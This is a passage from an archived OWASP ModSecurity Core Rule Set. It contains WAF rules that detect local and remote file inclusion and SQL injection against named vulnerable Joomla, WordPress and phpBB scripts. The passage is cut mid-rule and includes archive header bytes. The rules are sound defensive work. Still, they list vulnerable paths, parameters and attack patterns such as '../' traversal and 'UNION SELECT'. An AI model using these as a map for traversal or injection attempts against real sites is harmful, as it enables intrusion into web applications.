com_xgallery Component Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla XGallery com_xgallery Component Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012373) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Horde type Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /util/barcode.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012373,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Horde type Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:type "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Horde type Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012407) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Potential Wordpress local file disclosure vulnerability SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012407,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Potential Wordpress local file disclosure vulnerability',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains /options-runnow-iframe.php?wpabs=/" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:\\x00\&)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Potential Wordpress local file disclosure vulnerability',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012408) SpiderLabs Research (SLR) Public Vulns: 
ET WEB_SPECIFIC_APPS Potential Wordpress local file disclosure vulnerability SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012408,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Potential Wordpress local file disclosure vulnerability',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains /options-view_log-iframe.php?wpabs=/" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:\\x00\&logfile\=\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Potential Wordpress local file disclosure vulnerability',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012426) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress XCloner Plugin cloner.cron.php config Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/xcloner-backup-and-restore/cloner.cron.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012426,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress XCloner Plugin cloner.cron.php config Parameter Local File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,46582'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:config "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress XCloner Plugin cloner.cron.php config Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012427) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla XCloner Component cloner.cron.php config Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /administrator/components/com_xcloner-backupandrestore/cloner.cron.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012427,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla XCloner Component cloner.cron.php config Parameter Local File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,46582'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:config "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla XCloner Component cloner.cron.php config Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012571) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS jQuery Mega Menu Wordpress Plugin Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/jquery-mega-menu/skin.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012571,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS jQuery Mega Menu Wordpress Plugin Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:skin "(?i:\.\.\\x2f)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS jQuery Mega Menu Wordpress Plugin Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012657) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS eyeOS file Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /devtools/qooxdoo-sdk/framework/source/resource/qx/test/part/delay.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012657,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS eyeOS file Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule 
ARGS:sleep "@contains file=" "chain" SecRule ARGS:sleep "(?i:\.\.\\x2f)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS eyeOS file Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012668) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS LoCal Calendar System LIBDIR Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /lib/lcUser.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012668,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS LoCal Calendar System LIBDIR Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:LIBDIR "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS LoCal Calendar System LIBDIR Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012705) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress WP Publication file Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/wp-publication-archive/includes/openfile.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012705,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress WP Publication file Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress WP Publication file Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012721) SpiderLabs Research (SLR) Public Vulns: 
ET WEB_SPECIFIC_APPS LightNEasy File Manager language Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /plugins/filemanager/get_file.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012721,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS LightNEasy File Manager language Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:language "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS LightNEasy File Manager language Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012750) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS OrangeHRM path Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /plugins/PluginController.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012750,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS OrangeHRM path Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:path "(?i:\.\.\\x2f)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS OrangeHRM path Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012794) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ClanSphere CurrentFolder Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /mods/ckeditor/filemanager/connectors/php/connector.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012794,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS ClanSphere CurrentFolder Parameter Local File Inclusion 
Attempt',tag:'web-application-attack',tag:'bugtraq,47636'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:CurrentFolder "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ClanSphere CurrentFolder Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012945) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS nvisionix Roaming System sessions.php script Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /authenticate/sessions.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012945,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS nvisionix Roaming System sessions.php script Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:globalIncludeFilePath "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS nvisionix Roaming System sessions.php script Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012947) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WebC.be Fichier_a_telecharger Parameter Local File Disclosure Attempt SecRule REQUEST_LINE "@contains /telecharger.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012947,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WebC.be Fichier_a_telecharger Parameter Local File Disclosure Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/DIR_TRAVERSAL.*ARGS:Fichier_a_telecharger/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WebC.be Fichier_a_telecharger Parameter Local File Disclosure 
Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012948) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_jmsfileseller view Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012948,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_jmsfileseller view Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_jmsfileseller" "chain" SecRule ARGS:view "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_jmsfileseller view Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012949) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Opencadastre soustab.php script Local File Inclusion Vulnerability SecRule REQUEST_LINE "@contains /scr/soustab.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012949,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Opencadastre soustab.php script Local File Inclusion Vulnerability',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:dsn[phptype] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Opencadastre soustab.php script Local File Inclusion Vulnerability',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012995) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS People Joomla Component controller Parameter Local File Inclusion Vulnerability SecRule REQUEST_LINE 
"@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012995,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS People Joomla Component controller Parameter Local File Inclusion Vulnerability',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_people" "chain" SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS People Joomla Component controller Parameter Local File Inclusion Vulnerability',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2013309) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress PHP Speedy Plugin page Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/php_speedy_wp/libs/php_speedy/view/admin_container.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013309,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress PHP Speedy Plugin page Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:page "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress PHP Speedy Plugin page Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2013433) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla jfeedback Component controller parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013433,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla jfeedback Component controller parameter Local File 
Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_jfeedback" "chain" SecRule ARGS:controller "(?i:\\x2e\\x2e\\x2f)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla jfeedback Component controller parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2013464) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress UnGallery pic Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/ungallery/source_vuln.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013464,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress UnGallery pic Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:pic "(?i:\\x2e\\x2e\\x2f)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress UnGallery pic Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" SecMarker END_SLR_ET_LFI_RULES 
�����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/slr_rules/modsecurity_crs_46_slr_et_phpbb_attacks.conf�����0000664�0000000�0000000�00000050173�12164572564�0033377�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. 
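# ---------------------------------------------------------------
#
# This ruleset was created by Trustwave SpiderLabs Research Team and includes data from:
#
# http://www.emergingthreats.net/
#

# Gate for the rules that follow: when REQUEST_FILENAME (after the listed
# transformations) matches none of the phrases in
# modsecurity_46_slr_et_phpbb.data, processing jumps to the
# END_SLR_ET_PHPBB_RULES marker and the chains below are not evaluated.
# Detection coverage of every rule below therefore depends on that data file
# listing the script names the chains look for.
SecRule REQUEST_FILENAME "!@pmFromFile modsecurity_46_slr_et_phpbb.data" "id:'2000002',phase:2,nolog,pass,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,skipAfter:END_SLR_ET_PHPBB_RULES"

# (2008964) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS lcxBBportal Alpha portal_block.php phpbb_root_path parameter Remote File Inclusion
# Chain: request line names /portal_block.php, contains "GET ", and the
# phpbb_root_path parameter value starts with an ftp(s)/http(s)/php scheme.
# - ARGS:phpbb_root_path exposes only the parameter VALUE, so the pattern is
#   anchored at the start of the value and does not repeat the literal
#   "phpbb_root_path=" prefix (a pattern carrying that prefix would only match
#   a value that itself contained the parameter name, i.e. almost never).
# - "@contains GET " is a substring test on the whole request line, so this
#   chain only covers requests whose line contains "GET "; the same parameter
#   arriving with another method is not scored by this rule.
# - NOTE(review): the t: list is declared on the chain starter only; confirm
#   which transformations the chained links actually run with in this
#   deployment (presumably those of SecDefaultAction).
SecRule REQUEST_LINE "@contains /portal_block.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008964,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS lcxBBportal Alpha portal_block.php phpbb_root_path parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,32647'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:phpbb_root_path "(?i:^\s*(ftps?|https?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS lcxBBportal Alpha portal_block.php phpbb_root_path parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'"

# (2008965) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS lcxBBportal Alpha acp_lcxbbportal.php phpbb_root_path parameter Remote File Inclusion
# Same structure as 2008964, for /acp_lcxbbportal.php. The value pattern is
# anchored at the start of the parameter value for the same reason: ARGS:<name>
# never includes the "<name>=" text.
SecRule REQUEST_LINE "@contains /acp_lcxbbportal.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008965,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS lcxBBportal Alpha acp_lcxbbportal.php phpbb_root_path parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,32647'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:phpbb_root_path "(?i:^\s*(ftps?|https?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS lcxBBportal Alpha acp_lcxbbportal.php phpbb_root_path parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'"

# (2008938) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Multi SEO phpBB pfad parameter local file inclusion
# Chain: request line names /include/global.php, contains "GET ", and the pfad
# parameter value contains at least one "../" sequence. On a full chain match
# the critical anomaly score is added and the matched variable is recorded
# under a tx.<rule id>-WEB_ATTACK/PHPBB-... key.
SecRule REQUEST_LINE "@contains /include/global.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008938,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Multi SEO phpBB pfad parameter local file inclusion',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:pfad "(?i:(\.\.\/){1,})" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Multi SEO phpBB pfad parameter local file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'"

# (2002731) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Generic phpbb arbitrary command attempt
# Chain: request line contains ".php" and the phpbb_root_path parameter value
# begins with ftp(s), http(s) or php. There is no method link in this chain.
# The pattern is anchored at the start of the value because
# ARGS:phpbb_root_path does not contain the "phpbb_root_path=" text.
# NOTE(review): no ":" is required after the scheme word, so any value that
# merely begins with "php", "ftp" or "http" also matches; tighten if this
# produces false positives on the protected application.
SecRule REQUEST_LINE "@contains .php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2002731,rev:8,msg:'SLR: ET WEB_SPECIFIC_APPS Generic phpbb arbitrary command attempt',tag:'web-application-attack'"
    SecRule ARGS:phpbb_root_path "(?i:^(ftps?|https?|php))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Generic phpbb arbitrary command attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'"

# (2005967) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpBB2 Plus SQL Injection Attempt -- admin_acronyms.php id SELECT
SecRule REQUEST_LINE "@contains /admin/admin_acronyms.php" 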
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005967,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpBB2 Plus SQL Injection Attempt -- admin_acronyms.php id SELECT',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3033'" SecRule ARGS:id "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpBB2 Plus SQL Injection Attempt -- admin_acronyms.php id SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" # (2005968) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpBB2 Plus SQL Injection Attempt -- admin_acronyms.php id UNION SELECT SecRule REQUEST_LINE "@contains /admin/admin_acronyms.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005968,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpBB2 Plus SQL Injection Attempt -- admin_acronyms.php id UNION SELECT',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3033'" SecRule ARGS:id "(?i:UNION\s+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpBB2 Plus SQL Injection Attempt -- admin_acronyms.php id UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" # (2005969) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpBB2 Plus SQL Injection Attempt -- admin_acronyms.php id INSERT SecRule REQUEST_LINE "@contains /admin/admin_acronyms.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005969,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpBB2 Plus SQL Injection Attempt -- admin_acronyms.php id INSERT',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3033'" SecRule ARGS:id "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET 
WEB_SPECIFIC_APPS phpBB2 Plus SQL Injection Attempt -- admin_acronyms.php id INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" # (2005970) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpBB2 Plus SQL Injection Attempt -- admin_acronyms.php id DELETE SecRule REQUEST_LINE "@contains /admin/admin_acronyms.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005970,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpBB2 Plus SQL Injection Attempt -- admin_acronyms.php id DELETE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3033'" SecRule ARGS:id "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpBB2 Plus SQL Injection Attempt -- admin_acronyms.php id DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" # (2005971) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpBB2 Plus SQL Injection Attempt -- admin_acronyms.php id ASCII SecRule REQUEST_LINE "@contains /admin/admin_acronyms.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005971,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpBB2 Plus SQL Injection Attempt -- admin_acronyms.php id ASCII',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3033'" SecRule ARGS:id "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpBB2 Plus SQL Injection Attempt -- admin_acronyms.php id 